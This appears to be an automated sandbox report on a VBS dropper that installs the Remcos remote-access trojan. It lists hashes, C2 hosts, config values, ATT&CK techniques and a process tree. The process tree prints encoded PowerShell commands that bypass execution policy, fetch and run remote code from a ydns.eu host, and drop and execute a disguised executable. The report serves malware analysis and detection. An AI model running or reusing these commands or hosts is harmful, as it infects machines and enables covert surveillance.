Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 04:33

General

  • Target

    2230105.vbs

  • Size

    884B

  • MD5

    fbbe9c432bd57ec2999ed6c59f56e9fe

  • SHA1

    50a7227e75f3dbc73f2bbcc81798612fd7222868

  • SHA256

    73709402a093f4b559532f016cb0c7f8b7bc29b413dc3321a79f5a5a38b81c44

  • SHA512

    83805182c4588d089d4748143f093d1e48e5a1545c3deb15b1ffb4982d849868cbaf4ebe57d045513fad08b3cb74facd4b64d7680ac223db68711474d1fc3b03

Malware Config

Extracted

Family

remcos

Botnet

EU

C2

tornado.ydns.eu:1972

orifak.ydns.eu:1972

rdpown.ydns.eu:1972

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    RmgDEfdfdef-3FSSYH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2230105.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\sYsTEM32\wINdOWSpowERSHElL\v1.0\PowerShELl.exE
      "C:\Windows\sYsTEM32\wINdOWSpowERSHElL\v1.0\PowerShELl.exE" "POWERshELL -eX BYpASS -noP -EC aQBFAHgAKAAgAGkAbgB2AG8AawBlAC0AcgBlAHMAVABNAGUAdABoAE8ARAAgACcAaAB0AHQAcAA6AC8ALwB0AG8AcgBuAGEALgB5AGQAbgBzAC4AZQB1AC8AbwBuAC8AcgBlAHcAbwBwAC8AcABvAHcAZQByAHcAaQBuAG4AZQByAC4AcABzADEAJwApAA== "
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYpASS -noP -EC aQBFAHgAKAAgAGkAbgB2AG8AawBlAC0AcgBlAHMAVABNAGUAdABoAE8ARAAgACcAaAB0AHQAcAA6AC8ALwB0AG8AcgBuAGEALgB5AGQAbgBzAC4AZQB1AC8AbwBuAC8AcgBlAHcAbwBwAC8AcABvAHcAZQByAHcAaQBuAG4AZQByAC4AcABzADEAJwApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypaSs -NoP -W HIdDen -EC IAAJAEkAbgBWAG8AawBFAC0AcgBlAFMAdABNAEUAdABIAG8ARAAgAAkALQBVAHIASQAgAAkAKAAdIGgAdAB0AHAAOgAvAC8AdABvAHIAbgBhAC4AeQBkAG4AcwAuAGUAdQAvAB0gIAAgACAAIAArACAAIAAdIG8AHSAgACAAIAAgACsAIAAgAB0gbgAvAGIAcwB2AC8AVwBiAGwAeABoAHUAYQBrAHMAHSAgACAAIAAgACsAIAAgAB0gdQBqAHYAHSAgACAAIAAgACsAIAAgAB0gaABxAC4AZQAdICAAIAAgACAAKwAgACAAHSB4AB0gIAAgACAAIAArACAAIAAdIGUAHSAgACAAKQAgACAALQBvAHUAVABGAGkAbABFACAAIAAdICQAZQBOAHYAOgB0AGUAbQBQAFwARgBJAFIARQBGADAAWAAuAGUAeABlAB0gIAA7ACAACQAmACAACQAdICQAZQBOAFYAOgB0AEUAbQBQAFwARgBJAFIARQBGADAAWAAuAGUAeABlAB0g
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Users\Admin\AppData\Local\Temp\FIREF0X.exe
            "C:\Users\Admin\AppData\Local\Temp\FIREF0X.exe"
            5⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5048
            • C:\Windows\SysWOW64\SndVol.exe
              C:\Windows\System32\SndVol.exe
              6⤵
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2624
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
    1⤵
      PID:2068
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k UnistackSvcGroup
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3496

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4222a755c020799d14ad6a3a5895e8ff

      SHA1

      616b534f87f8a9cedf5089beb3778fa634af8e5b

      SHA256

      1743a21bfa8fa07150825981fb41fb485b6737959b8aeb6acf80aa11783ebd78

      SHA512

      b02b21c85068029d8b4f3e9d5b4fc851400a24a8b424e94b2af7c7dafb5d8bf83462423b4e287f0b8bcfeea5ff8ce9b8310a98bdb4771b581d848c88ed8bc798

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

    • C:\Users\Admin\AppData\Local\Temp\FIREF0X.exe
      Filesize

      1.5MB

      MD5

      c7fcb915a272045036e5d8e0de23fd5a

      SHA1

      19df745007c4edbb727851db3c65290620389a20

      SHA256

      0fcbcb5c98c97d26b4df12fc4b1f18c926df5e943b6cad241836985f5da0290e

      SHA512

      21e1adf068bd8211f3586af95726e691b1527ba17183ff7f8214b535cca7d65d94a63f985a62c6d2a010cd481e9dff09c4c1909a443c6ef54d7d7f83739ccca3

    • C:\Users\Admin\AppData\Local\Temp\FIREF0X.exe
      Filesize

      1.5MB

      MD5

      c7fcb915a272045036e5d8e0de23fd5a

      SHA1

      19df745007c4edbb727851db3c65290620389a20

      SHA256

      0fcbcb5c98c97d26b4df12fc4b1f18c926df5e943b6cad241836985f5da0290e

      SHA512

      21e1adf068bd8211f3586af95726e691b1527ba17183ff7f8214b535cca7d65d94a63f985a62c6d2a010cd481e9dff09c4c1909a443c6ef54d7d7f83739ccca3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ncbp3kcy.xoj.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Public\Libraries\Wblxhuak.PIF
      Filesize

      1.5MB

      MD5

      c7fcb915a272045036e5d8e0de23fd5a

      SHA1

      19df745007c4edbb727851db3c65290620389a20

      SHA256

      0fcbcb5c98c97d26b4df12fc4b1f18c926df5e943b6cad241836985f5da0290e

      SHA512

      21e1adf068bd8211f3586af95726e691b1527ba17183ff7f8214b535cca7d65d94a63f985a62c6d2a010cd481e9dff09c4c1909a443c6ef54d7d7f83739ccca3

    • memory/1600-0-0x0000023FFBB30000-0x0000023FFBB52000-memory.dmp
      Filesize

      136KB

    • memory/1600-56-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/1600-11-0x0000023FFBBC0000-0x0000023FFBBD0000-memory.dmp
      Filesize

      64KB

    • memory/1600-53-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/1600-13-0x0000023FFBBC0000-0x0000023FFBBD0000-memory.dmp
      Filesize

      64KB

    • memory/1600-12-0x0000023FFBBC0000-0x0000023FFBBD0000-memory.dmp
      Filesize

      64KB

    • memory/1600-10-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/2016-14-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/2016-52-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/2016-26-0x0000021D2D410000-0x0000021D2D5D2000-memory.dmp
      Filesize

      1.8MB

    • memory/2016-25-0x0000021D2AC40000-0x0000021D2AC50000-memory.dmp
      Filesize

      64KB

    • memory/2016-24-0x0000021D2AC40000-0x0000021D2AC50000-memory.dmp
      Filesize

      64KB

    • memory/2336-47-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/2336-39-0x0000023C90A30000-0x0000023C90A40000-memory.dmp
      Filesize

      64KB

    • memory/2336-34-0x0000023C90A30000-0x0000023C90A40000-memory.dmp
      Filesize

      64KB

    • memory/2336-28-0x0000023C90A30000-0x0000023C90A40000-memory.dmp
      Filesize

      64KB

    • memory/2336-27-0x00007FFCD6980000-0x00007FFCD7441000-memory.dmp
      Filesize

      10.8MB

    • memory/2624-75-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-76-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-123-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-122-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-121-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-65-0x0000000002A40000-0x0000000003A40000-memory.dmp
      Filesize

      16.0MB

    • memory/2624-67-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-69-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-70-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-71-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-72-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-74-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-120-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-82-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-80-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/2624-81-0x0000000000400000-0x0000000000482000-memory.dmp
      Filesize

      520KB

    • memory/3496-83-0x000001DB34940000-0x000001DB34950000-memory.dmp
      Filesize

      64KB

    • memory/3496-99-0x000001DB34A40000-0x000001DB34A50000-memory.dmp
      Filesize

      64KB

    • memory/3496-115-0x000001DB3CD60000-0x000001DB3CD61000-memory.dmp
      Filesize

      4KB

    • memory/3496-117-0x000001DB3CD90000-0x000001DB3CD91000-memory.dmp
      Filesize

      4KB

    • memory/3496-118-0x000001DB3CD90000-0x000001DB3CD91000-memory.dmp
      Filesize

      4KB

    • memory/3496-119-0x000001DB3CEA0000-0x000001DB3CEA1000-memory.dmp
      Filesize

      4KB

    • memory/5048-59-0x0000000002AE0000-0x0000000003AE0000-memory.dmp
      Filesize

      16.0MB

    • memory/5048-57-0x0000000000720000-0x0000000000721000-memory.dmp
      Filesize

      4KB

    • memory/5048-58-0x0000000002AE0000-0x0000000003AE0000-memory.dmp
      Filesize

      16.0MB

    • memory/5048-62-0x0000000000720000-0x0000000000721000-memory.dmp
      Filesize

      4KB

    • memory/5048-61-0x0000000000400000-0x0000000000593000-memory.dmp
      Filesize

      1.6MB